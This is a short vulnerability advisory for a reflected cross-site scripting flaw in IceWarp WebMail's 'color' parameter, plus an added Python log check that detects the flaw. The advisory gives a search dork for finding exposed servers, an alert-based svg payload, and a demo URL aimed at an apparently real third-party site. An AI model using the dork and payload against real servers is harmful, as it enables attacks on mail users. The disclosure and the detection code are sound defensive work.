
IceWarp WebMail Cross-Site Scripting Vulnerability

- February 06, 2020

[+] Date: 2020/01/27
[+] Author: Lutfu Mert Ceylan
[+] Vendor Homepage: www.icewarp.com
[+] Tested on: Windows 7
[+] Versions: 11.4.4.1 and before
[+] Vulnerable Parameter: "color" (Get Method)
[+] Vulnerable File: /webmail/
[+] Dork : inurl:/webmail/ intext:Powered by IceWarp Server

Example : https://target.com/webmail/ or https://target.com:32000/webmail/
Example Vuln url : https://target.com/webmail/?color="><svg/onload=alert(1)>
Payload : <svg/onload=alert(1)> or search here


Demo : https://hchra.org:32001/webmail/?color="><svg/onload=alert('lawsec')>
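
Added example, not part of the original advisory: a log check that flags requests to /webmail/ whose "color" GET parameter carries anything other than a plain colour value, which is how the reflected payload above shows up on the server side. The allowlist pattern (short alphanumeric name or hex colour) and the combined-format log lines are assumptions and constructed sample data, not IceWarp's documented behaviour.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate "color" value is a short theme name or hex colour.
SAFE_COLOR = re.compile(r"#?[A-Za-z0-9_-]{1,32}")
# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [27/Jan/2020:10:00:01 +0000] '
    '"GET /webmail/?color=blue HTTP/1.1" 200 5120',
    '192.0.2.11 - - [27/Jan/2020:10:00:05 +0000] '
    '"GET /webmail/?color=%22%3E%3Csvg/onload=alert(1)%3E HTTP/1.1" 200 5188',
    '192.0.2.12 - - [27/Jan/2020:10:00:09 +0000] '
    '"GET /index.html?color=%3Cb%3E HTTP/1.1" 200 300',
    '192.0.2.13 - - [27/Jan/2020:10:00:12 +0000] '
    '"GET /webmail/?color=%23ff8800 HTTP/1.1" 200 5120',
]


def suspicious_color_requests(log_lines):
    """Return (line_no, decoded_value) for /webmail/ hits with an unsafe color."""
    hits = []
    for line_no, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.lower().startswith("/webmail"):
            continue
        # parse_qs percent-decodes values, so encoded markup is caught too.
        params = parse_qs(url.query, keep_blank_values=True)
        for value in params.get("color", []):
            if not SAFE_COLOR.fullmatch(value):
                hits.append((line_no, value))
    return hits


if __name__ == "__main__":
    for line_no, value in suspicious_color_requests(SAMPLE):
        print(f"line {line_no}: unexpected color value {value!r}")
```
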
